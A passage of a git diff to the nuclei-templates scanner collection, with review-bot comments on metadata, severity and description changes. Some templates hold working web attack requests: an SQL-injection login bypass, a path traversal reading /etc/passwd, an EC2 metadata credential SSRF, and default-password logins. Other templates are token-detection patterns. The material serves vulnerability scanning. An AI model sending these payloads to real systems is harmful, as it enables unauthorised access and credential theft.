b/nuclei-templates/Other/all-404-redirect-to-homepage.yaml 
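Review bot: The empty `cve-id:` added to alienvault-usm parses as a null value, and together with `cvss-score: 0.0` it goes against the rest of this commit, which strips exactly those lines from sibling panel templates (`airnotifier-panel` and `allied-telesis-exposure` drop `cvss-score: 0.0`, and the deleted `alfresco-detect-259.yaml` carried the same empty `cve-id:`). I would keep `cvss-metrics` and `cwe-id: CWE-200` and drop the `cve-id:` and `cvss-score: 0.0` lines. The appended `# Enhanced by mp on 2022/03/16` trailer is likewise being replaced by `# digest:` lines elsewhere in the commit and can go.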
@@ -1,19 +1,19 @@ id: wordpress-all-404-redirect-to-homepage info: - name: All 404 Redirect to Homepage & Broken images Redirection Detection + name: All 404 Redirect to Homepage Detection author: ricardomaia severity: info reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 -requests: +http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt" @@ -47,3 +47,5 @@ requests: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221009a1f00db570e0862b0c2e0430ee4957a6f96b1fe23a276f80eb7820aba82f1df022100f8f0e9b975f46c0ebc8c12bc7e9b6e007be1326bcb9af6b02631d492b3752149:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/all-in-one-seo-pack.yaml b/nuclei-templates/Other/all-in-one-seo-pack.yaml index 141b18afbd..8addc28ded 100644 --- a/nuclei-templates/Other/all-in-one-seo-pack.yaml +++ b/nuclei-templates/Other/all-in-one-seo-pack.yaml @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/all-in-one-wp-migration.yaml b/nuclei-templates/Other/all-in-one-wp-migration.yaml index 70137d7ce6..55362630df 100644 --- a/nuclei-templates/Other/all-in-one-wp-migration.yaml +++ b/nuclei-templates/Other/all-in-one-wp-migration.yaml @@ -1,7 +1,7 @@ id: wordpress-all-in-one-wp-migration info: - name: All-in-One WP Migration Detection + name: All-in-One WP Migration and Backup Detection author: ricardomaia severity: info reference: @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 -requests: +http: - method: GET path: 
diff --git a/nuclei-templates/Other/all-in-one-wp-security-and-firewall.yaml b/nuclei-templates/Other/all-in-one-wp-security-and-firewall.yaml index 1789c98b1f..41e297ffeb 100644 --- a/nuclei-templates/Other/all-in-one-wp-security-and-firewall.yaml +++ b/nuclei-templates/Other/all-in-one-wp-security-and-firewall.yaml @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/allied-telesis-exposure.yaml b/nuclei-templates/Other/allied-telesis-exposure.yaml index e151402c41..b8e48488e2 100644 --- a/nuclei-templates/Other/allied-telesis-exposure.yaml +++ b/nuclei-templates/Other/allied-telesis-exposure.yaml @@ -9,14 +9,16 @@ info: - https://www.alliedtelesis.com/in/en classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true + max-request: 1 + product: device_gui shodan-query: title:"Allied Telesis Device GUI" - tags: panel,allied + vendor: allied_telesis + verified: true + tags: panel,allied,allied_telesis -requests: +http: - method: GET path: - "{{BaseURL}}/public/login.html" @@ -36,5 +38,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/11/09 +# digest: 4a0a00473045022100ee028fb7d8d6ac97c18dca4a3bfad7955ccd4c636f8a6fc017f2ff150f56700302207da21269f555a6a7ac988509c3799af6823420b112f4879cc9a9c7ae7e775b29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/alpha-malware.yaml b/nuclei-templates/Other/alpha-malware.yaml index 667414d798..8e1c21699a 100644 --- a/nuclei-templates/Other/alpha-malware.yaml +++ b/nuclei-templates/Other/alpha-malware.yaml 
@@ -6,12 +6,12 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: - "520065006100640020004D0065002000280048006F00770020004400650063" + +# digest: 4a0a004730450221009b5e9aa41a25cb5d9482c691f43bb6f1711b5a6907c684034f43192929520cb20220085710f5e83b940ae1e8defff1687753b6525289356cf579f3108a1a10620b52:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/alphaweb-default-login-275.yaml b/nuclei-templates/Other/alphaweb-default-login-275.yaml new file mode 100644 index 0000000000..f3bccdcc96 --- /dev/null +++ b/nuclei-templates/Other/alphaweb-default-login-275.yaml @@ -0,0 +1,38 @@ +id: alphaweb-default-login +info: + name: AlphaWeb XE Default Login + author: Lark Lab + severity: medium + description: An AlphaWeb XE default login was discovered. + reference: + - https://wiki.zenitel.com/wiki/AlphaWeb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + tags: default-login,AlphaWeb +requests: + - raw: + - | + GET /php/node_info.php HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + Referer: {{BaseURL}} + attack: pitchfork + payloads: + username: + - admin + password: + - alphaadmin + matchers-condition: and + matchers: + - type: word + words: + - "HW Configuration" + - "SW Configuration" + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/alphaweb-default-login-277.yaml b/nuclei-templates/Other/alphaweb-default-login-277.yaml deleted file mode 100644 index 6532087439..0000000000 --- a/nuclei-templates/Other/alphaweb-default-login-277.yaml +++ /dev/null 
@@ -1,35 +0,0 @@ -id: alphaweb-default-login - -info: - name: AlphaWeb XE Default Login - author: Lark Lab - severity: medium - tags: default-login - reference: https://wiki.zenitel.com/wiki/AlphaWeb - -requests: - - raw: - - | - GET /php/node_info.php HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - Referer: {{BaseURL}} - - attack: pitchfork - payloads: - username: - - admin - password: - - alphaadmin - - matchers-condition: and - matchers: - - type: word - words: - - "HW Configuration" - - "SW Configuration" - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/alumni-management-sqli.yaml b/nuclei-templates/Other/alumni-management-sqli.yaml index 6aa3ed4678..44822a70d5 100644 --- a/nuclei-templates/Other/alumni-management-sqli.yaml +++ b/nuclei-templates/Other/alumni-management-sqli.yaml @@ -11,24 +11,24 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-29214 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 + metadata: + max-request: 2 tags: sqli,auth-bypass,cms,edb,alumni -requests: +http: - raw: - | POST /admin/ajax.php?action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - username=admin'+or+'1'%3D'1'%23&password=nuclei - + username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}} - | GET /admin/index.php?page=home HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -47,5 +47,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/09/28 +# digest: 4a0a004730450220018fffbf6de668d89ce9eae82ff88200d531cabc845740af0c3935c175085b19022100c586ae602b1ded9e02d5a925b3c1dcdd0c9e94b45e6c2335c2134957ee77448c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
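Review bot: Dropping `cookie-reuse: true` from `alumni-management-sqli.yaml` makes the auth-bypass check depend on the engine carrying the session cookie from the login response into the second request (`GET /admin/index.php?page=home`) by default; on a nuclei build where cookie reuse is opt-in, that second request is unauthenticated and the template silently stops detecting the bypass. If the engine version this repository targets is known to default to cookie reuse, this is fine; otherwise keep the line. The `cvss-score: 10.0` → `10` change is cosmetic and can go either way.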
diff --git a/nuclei-templates/Other/amazon-account-id.yaml b/nuclei-templates/Other/amazon-account-id.yaml index 01ffd5b250..0ca716b7c6 100644 --- a/nuclei-templates/Other/amazon-account-id.yaml +++ b/nuclei-templates/Other/amazon-account-id.yaml @@ -13,7 +13,8 @@ info: cwe-id: CWE-200 metadata: verified: true - tags: aws,amazon,token,file + tags: file,keys,aws,amazon,token + file: - extensions: - all @@ -25,4 +26,4 @@ file: - '(?i)aws_?(?:account)_?(?:id)?["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([0-9]{4}-?[0-9]{4}-?[0-9]{4})' # Enhanced by md on 2023/05/04 -# digest: 490a0046304402204cdf5ae5eafb194436533d3bd5d707d3ed6e82bde669a90a33d3d6e7f841a4f1022016cc2daac84b2c82e2566fd7f5c68b83f2f1cbf93a5a19d259ac963a0ac330d0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ad930551f3063ad8ee7027d7e0af408452b42a4dc33ba7a99e5bcbcf845c7e05022100b1d4fcc47c2ae007d17b06c945a91c56d8f4f5166d69688d8707bc4fcb69266e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/amazon-docker-config.yaml b/nuclei-templates/Other/amazon-docker-config-280.yaml similarity index 100% rename from nuclei-templates/Other/amazon-docker-config.yaml rename to nuclei-templates/Other/amazon-docker-config-280.yaml diff --git a/nuclei-templates/Other/amazon-ec2-detect.yaml b/nuclei-templates/Other/amazon-ec2-detect.yaml index 1fa0949efb..1f89e63f10 100644 --- a/nuclei-templates/Other/amazon-ec2-detect.yaml +++ b/nuclei-templates/Other/amazon-ec2-detect.yaml @@ -6,10 +6,11 @@ info: severity: info metadata: verified: true + max-request: 1 shodan-query: "Server: EC2ws" tags: tech,aws,ec2,amazon -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -19,3 +20,5 @@ requests: part: header words: - "Server: EC2ws" + +# digest: 490a00463044022038c3707c1de6f7d7e9ba67bcbd20bdbe0325a5f9385ab29a96674f860f7b627c0220785363c27ef7b0583a9c77c677b979794645b1776b39ecd9905bb0999d00470d:922c64590222798bb761d5b6d8e72950 
diff --git a/nuclei-templates/Other/amazon-ec2-ssrf.yaml b/nuclei-templates/Other/amazon-ec2-ssrf.yaml index 0162dbc5bb..261f80cc17 100644 --- a/nuclei-templates/Other/amazon-ec2-ssrf.yaml +++ b/nuclei-templates/Other/amazon-ec2-ssrf.yaml @@ -4,16 +4,18 @@ info: name: Amazon EC2 - Server-side request forgery (SSRF) author: DhiyaneshDk severity: critical + description: SSRF vulnerability exists in Amazon EC2, or Amazon Elastic Compute Cloud which is a web service provided by Amazon Web Services (AWS) that offers resizable compute capacity in the cloud. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 metadata: verified: true + max-request: 2 shodan-query: "Server: EC2ws" tags: aws,ec2,ssrf,amazon -requests: +http: - raw: - |+ GET {{BaseURL}}/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1 @@ -26,6 +28,7 @@ requests: stop-at-first-match: true unsafe: true + matchers-condition: and matchers: - type: word @@ -38,3 +41,4 @@ requests: - type: status status: - 200 +# digest: 4b0a004830460221009f819ee1784d9fae5ec437af8582ba3ae0acdfec4fc0f17a406484bc5b571ca4022100f9eddb7733eeabc5bda330300d5f5906a4e407c981433a6da41ec854e6a00864:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/amazon-mws-auth-token-11845.yaml b/nuclei-templates/Other/amazon-mws-auth-token-11845.yaml new file mode 100755 index 0000000000..7014b6572f --- /dev/null +++ b/nuclei-templates/Other/amazon-mws-auth-token-11845.yaml @@ -0,0 +1,17 @@ +id: amazon-mws-auth-token-value + +info: + author: puzzlepeaches + name: "Amazon MWS Auth Token" + severity: medium + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" 
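Review bot: The added `description` states that an SSRF vulnerability exists in Amazon EC2 itself, but the request in this hunk (`GET {{BaseURL}}/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance`) tests whether the scanned application forwards requests to the EC2 instance metadata service; the weakness is in the target application, and the metadata service and the credentials it returns are what is exposed. Suggested wording: `description: The target application can be made to fetch the EC2 instance metadata service, exposing instance identity credentials (SSRF).` The remainder of the sentence is marketing boilerplate about EC2 and can be dropped.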
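Review bot: The new `amazon-mws-auth-token-11845.yaml` declares `id: amazon-mws-auth-token-value`, which does not match its base file name, while the rest of this commit keeps id and file name aligned (e.g. `ambari-default-login-287.yaml` → `id: ambari-default-login`); `amazon-mws-auth-token-283.yaml` is also renamed to `amazon-mws-auth-token.yaml` in this range, and its id is not visible here, so a collision cannot be ruled out. The template further has no `tags` and no `matchers`, relying on the extractor alone to produce a hit, so a finding is reported wherever the regex matches; adding `tags: token,amazon,auth` (the deleted file-protocol version carried `token,file,amazon,auth`) would at least make it selectable by tag.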
diff --git a/nuclei-templates/Other/amazon-mws-auth-token-value.yaml b/nuclei-templates/Other/amazon-mws-auth-token-value.yaml deleted file mode 100644 index 0ab5703b9c..0000000000 --- a/nuclei-templates/Other/amazon-mws-auth-token-value.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: amazon-mws-auth-token-value - -info: - name: Amazon MWS Auth Token - author: gaurang - severity: medium - tags: token,file,amazon,auth - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" diff --git a/nuclei-templates/Other/amazon-mws-auth-token-283.yaml b/nuclei-templates/Other/amazon-mws-auth-token.yaml similarity index 100% rename from nuclei-templates/Other/amazon-mws-auth-token-283.yaml rename to nuclei-templates/Other/amazon-mws-auth-token.yaml diff --git a/nuclei-templates/Other/amazon-session-token.yaml b/nuclei-templates/Other/amazon-session-token.yaml index 8a6529f2b4..4d886ded5b 100644 --- a/nuclei-templates/Other/amazon-session-token.yaml +++ b/nuclei-templates/Other/amazon-session-token.yaml @@ -13,7 +13,8 @@ info: cwe-id: CWE-200 metadata: verified: true - tags: aws,amazon,token,file,session + tags: file,keys,aws,amazon,token,session + file: - extensions: - all @@ -25,4 +26,4 @@ file: - '(?i)(?:aws.?session|aws.?session.?token|aws.?token)["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]' # Enhanced by md on 2023/05/04 -# digest: 490a00463044022042bbced45aee0d6943da5aac1efe8367af4c8d494a624bf45d428530a6fcba6e02204537fb05ae1ae72607f23bf06b9c8e0d20b917ba425905e80ce47cc7835d0a70:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022012a50d46848dcc172a05c5e2fd88e802af8022bf13ab09dbf8740ae3ad5855f5022100c16953404125451a8cfc4ed26412b99b0d25c02e73a6c7ba8337a905c7e2efa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/Other/ambari-default-login-287.yaml b/nuclei-templates/Other/ambari-default-login-287.yaml new file mode 100644 index 0000000000..e251839b56 --- /dev/null +++ b/nuclei-templates/Other/ambari-default-login-287.yaml @@ -0,0 +1,26 @@ +id: ambari-default-login + +info: + name: Apache Ambari Default Login + author: pdteam + severity: medium + tags: ambari,default-login,apache + +requests: + - raw: + - | + GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers: + - type: word + words: + - '"Users" : {' + - 'AMBARI.' + condition: and diff --git a/nuclei-templates/Other/ambari-default-login-290.yaml b/nuclei-templates/Other/ambari-default-login-290.yaml deleted file mode 100644 index 7d9efa4734..0000000000 --- a/nuclei-templates/Other/ambari-default-login-290.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: ambari-default-login - -info: - name: Apache Ambari Default Login - author: pdteam - description: An Apache Ambari default admin login was discovered. - severity: high - reference: - - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: ambari,default-login,apache - -requests: - - raw: - - | - GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - payloads: - username: - - admin - password: - - admin - attack: pitchfork - matchers: - - type: word - words: - - '"Users" : {' - - 'AMBARI.' - condition: and - -# Enhanced by mp on 2022/03/22 
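Review bot: The new `ambari-default-login-287.yaml` replaces the deleted `-290` variant with a sparser template: it drops the `description`, `reference` and `classification` (CVSS 8.3 / CWE-522) blocks and lowers `severity` from `high` to `medium`, with nothing in the commit explaining the downgrade. The request itself queries the admin user's privileges and cluster names, which is consistent with the rating the deleted classification gave; keeping `severity: high` and the `cwe-id: CWE-522` classification seems more defensible unless the downgrade is deliberate. Restoring the `reference` entry would also keep the link to the Ambari installation guide that documents the default credential.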
diff --git a/nuclei-templates/Other/ambari-exposure-294.yaml b/nuclei-templates/Other/ambari-exposure-291.yaml similarity index 100% rename from nuclei-templates/Other/ambari-exposure-294.yaml rename to nuclei-templates/Other/ambari-exposure-291.yaml diff --git a/nuclei-templates/Other/amcrest-login-297.yaml b/nuclei-templates/Other/amcrest-login-297.yaml deleted file mode 100644 index 19837aca9a..0000000000 --- a/nuclei-templates/Other/amcrest-login-297.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: amcrest-login - -info: - name: Amcrest Login - author: DhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/7273 - metadata: - shodan-query: html:"amcrest" - google-dork: intext:"amcrest" "LDAP User" - tags: panel,camera,amcrest - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - "Amcrest Technologies" - - "LDAPUser" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/amcrest-login.yaml b/nuclei-templates/Other/amcrest-login.yaml new file mode 100644 index 0000000000..1c2714211b --- /dev/null +++ b/nuclei-templates/Other/amcrest-login.yaml @@ -0,0 +1,34 @@ +id: amcrest-login + +info: + name: Amcrest Login + author: DhiyaneshDK + severity: info + description: An Amcrest LDAP user login was discovered. + reference: + - https://www.exploit-db.com/ghdb/7273 + classification: + cwe-id: CWE-200 + metadata: + shodan-query: html:"amcrest" + google-dork: intext:"amcrest" "LDAP User" + tags: panel,camera,amcrest + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Amcrest Technologies" + - "LDAPUser" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/amministrazione-aperta-lfi-303.yaml b/nuclei-templates/Other/amministrazione-aperta-lfi-303.yaml index f9fc49bd56..fc4889c7bd 100644 
--- a/nuclei-templates/Other/amministrazione-aperta-lfi-303.yaml +++ b/nuclei-templates/Other/amministrazione-aperta-lfi-303.yaml @@ -1,15 +1,22 @@ id: amministrazione-aperta-lfi info: - name: Amministrazione Aperta 3.7.3 - Unauthenticated Local File Read + name: WordPress Amministrazione Aperta 3.7.3 - Local File Inclusion author: daffainfo,Splint3r7 severity: high + description: WordPress Amministrazione Aperta 3.7.3 is vulnerable to local file inclusion. reference: - https://www.exploit-db.com/exploits/50838 - https://wordpress.org/plugins/amministrazione-aperta - tags: wordpress,wp-plugin,lfi,wp + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + metadata: + max-request: 1 + tags: wp-plugin,lfi,wp,edb,wordpress -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd' @@ -23,3 +30,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a004730450220483f16724935dcc058e8021d5b6eed5abd21252eecf528ed52a6c648c2fcc138022100a6df64050b8681607c16b6684dc3344056e6838828fd12baf1f99be86c95fc13:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/amp-application-panel.yaml b/nuclei-templates/Other/amp-application-panel.yaml index 5db160e1fa..ffbe2c2331 100644 --- a/nuclei-templates/Other/amp-application-panel.yaml +++ b/nuclei-templates/Other/amp-application-panel.yaml 
@@ -7,21 +7,23 @@ info: description: Application Management Panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:cubecoders:amp:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 1 + product: amp shodan-query: title:"AMP - Application Management Panel" - tags: panel,amp + vendor: cubecoders + verified: true + tags: panel,amp,cubecoders -requests: +http: - method: GET path: - "{{BaseURL}}" matchers-condition: and matchers: - - type: word words: - "AMP - Application Management Panel" @@ -30,5 +32,4 @@ requests: part: header words: - "text/html" - -# Enhanced by md on 2022/10/31 +# digest: 490a00463044022001f279a936bf2746faf11df9f5e6c7ec5dfcb230319b17e97649696af44561f602203d4cd614cdc13e7c5718cc1e8c9fad14b631666ee55b676a4c32c4365b3ed320:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/amp.yaml b/nuclei-templates/Other/amp.yaml index 058f93549a..0dd8686ec3 100644 --- a/nuclei-templates/Other/amp.yaml +++ b/nuclei-templates/Other/amp.yaml @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/ampache-debug.yaml b/nuclei-templates/Other/ampache-debug.yaml index fa4eccf37e..733132b6f9 100644 --- a/nuclei-templates/Other/ampache-debug.yaml +++ b/nuclei-templates/Other/ampache-debug.yaml @@ -6,10 +6,11 @@ info: severity: info metadata: verified: true + max-request: 2 shodan-query: http.title:"Ampache -- Debug Page" tags: misconfig,ampache,debug -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -18,6 +19,7 @@ requests: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word 
@@ -28,3 +30,5 @@ requests: - type: status status: - 200 + +# digest: 490a0046304402204fc96c27b19ab1615ece4b327244a62166cee8f2f8aabd0a48dbefab8865984502201572545154f63f6bf6f67cbbdbc65d7a0e7b286b67fdcf4424c5e5c446cb48ff:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/ampache-music-installer.yaml b/nuclei-templates/Other/ampache-music-installer.yaml index 9b9edd61f2..053575bdf0 100644 --- a/nuclei-templates/Other/ampache-music-installer.yaml +++ b/nuclei-templates/Other/ampache-music-installer.yaml @@ -4,12 +4,14 @@ info: name: Ampache Music Installer author: tess severity: high + description: Ampache Music is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true + max-request: 1 shodan-query: title:"For the Love of Music - Installation" tags: misconfig,ampache,install,exposure -requests: +http: - method: GET path: - '{{BaseURL}}/install.php' @@ -31,3 +33,4 @@ requests: - type: status status: - 200 +# digest: 490a004630440220605ea50cd6b226cdbce1435b6626cd250bc67ac9f560eece87174fc44f6f93b20220135a1b12364086757ef627dd5560776ee8ba1cff657acf8cc6204cfb783bb52a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ampache-panel.yaml b/nuclei-templates/Other/ampache-panel.yaml index db35771994..1efadb34ec 100644 --- a/nuclei-templates/Other/ampache-panel.yaml +++ b/nuclei-templates/Other/ampache-panel.yaml @@ -7,14 +7,17 @@ info: description: Ampache login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 3 + product: ampache shodan-query: http.title:"For the Love of Music" + vendor: ampache + verified: true tags: panel,ampache -requests: +http: - method: GET path: - "{{BaseURL}}" 
@@ -24,6 +27,7 @@ requests: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -41,5 +45,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/11/09 +# digest: 490a00463044022026ff670001f355854261f51aa9568db44aab6ef281df0e668e39bca7245c0c22022018267c7949b2c76dfc72631a00c2dc64303405e61e78e4c3e6ec00de060befbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ampache-update-exposure.yaml b/nuclei-templates/Other/ampache-update-exposure.yaml index 4677d01b8c..0ced7ddb91 100644 --- a/nuclei-templates/Other/ampache-update-exposure.yaml +++ b/nuclei-templates/Other/ampache-update-exposure.yaml @@ -4,12 +4,14 @@ info: name: Ampache Update Page Exposure author: ritikchaddha severity: low + description: Ampache update page is exposed. metadata: verified: true + max-request: 1 shodan-query: http.html:"Ampache Update" tags: misconfig,ampache,exposure -requests: +http: - method: GET path: - "{{BaseURL}}/update.php" @@ -32,3 +34,4 @@ requests: - type: status status: - 200 +# digest: 4a0a004730450221008c0739e4fd795e10d4e26b6443d2e7aaaca3f7a319581604454da0b81291e1da0220044cbd8795a1b1cae54923ff98d84c81e7d7aceb029169ab143825e7caa870f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ampguard-wifi-setup.yaml b/nuclei-templates/Other/ampguard-wifi-setup.yaml index dcdc9f174d..66cd41b90e 100644 --- a/nuclei-templates/Other/ampguard-wifi-setup.yaml +++ b/nuclei-templates/Other/ampguard-wifi-setup.yaml @@ -4,12 +4,14 @@ info: name: AmpGuard Wifi Setup author: pussycat0x severity: info + description: AmpGuard wifi setup panel detected. metadata: - verified: "true" + verified: true + max-request: 1 shodan-query: title:"AmpGuard wifi setup" tags: ampguard,iot,setup,wifi -requests: +http: - method: GET path: - "{{BaseURL}}" 
@@ -24,3 +26,4 @@ requests: - type: status status: - 200 +# digest: 4b0a00483046022100d4a3cb12fcee3738ca5f49ef572ccb813ae3b2a4376c51ead505f958f5c6769c022100a3fda6aba76d72daa14a29577b2e82809ef414d063776383e5bb38fe7b9cef00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ampps-admin-panel-306.yaml b/nuclei-templates/Other/ampps-admin-panel-305.yaml similarity index 100% rename from nuclei-templates/Other/ampps-admin-panel-306.yaml rename to nuclei-templates/Other/ampps-admin-panel-305.yaml diff --git a/nuclei-templates/Other/ampps-dirlisting.yaml b/nuclei-templates/Other/ampps-dirlisting-308.yaml similarity index 100% rename from nuclei-templates/Other/ampps-dirlisting.yaml rename to nuclei-templates/Other/ampps-dirlisting-308.yaml diff --git a/nuclei-templates/Other/ampps-panel-309.yaml b/nuclei-templates/Other/ampps-panel-309.yaml deleted file mode 100644 index 4a44ba9360..0000000000 --- a/nuclei-templates/Other/ampps-panel-309.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: ampps-panel - -info: - name: AMPPS Login Panel - author: deFr0ggy - severity: info - description: An AMPPS login panel was detected. - classification: - cwe-id: CWE-200 - tags: panel,ampps,login - -requests: - - method: GET - path: - - "{{BaseURL}}/ampps/index.php?act=login" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - 'Login' - - 'themes/default/images/ampps/favicon.ico' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ampps-panel-310.yaml b/nuclei-templates/Other/ampps-panel-310.yaml new file mode 100644 index 0000000000..38d3d1d423 --- /dev/null +++ b/nuclei-templates/Other/ampps-panel-310.yaml 
@@ -0,0 +1,35 @@ +id: ampps-panel + +info: + name: AMPPS Login Panel + author: deFr0ggy + severity: info + tags: panel,ampps,login + +requests: + - method: GET + path: + - "{{BaseURL}}/ampps/index.php?act=login" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'Login' + - 'themes/default/images/ampps/favicon.ico' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' diff --git a/nuclei-templates/Other/analytify-plugin-xss.yaml b/nuclei-templates/Other/analytify-plugin-xss.yaml index d4547f82d2..9c07ff965f 100644 --- a/nuclei-templates/Other/analytify-plugin-xss.yaml +++ b/nuclei-templates/Other/analytify-plugin-xss.yaml @@ -8,16 +8,17 @@ info: WordPress Analytify 4.2.1 does not escape the current URL before outputting it back in a 404 page when the 404 tracking feature is enabled, leading to reflected cross-site scripting. reference: - 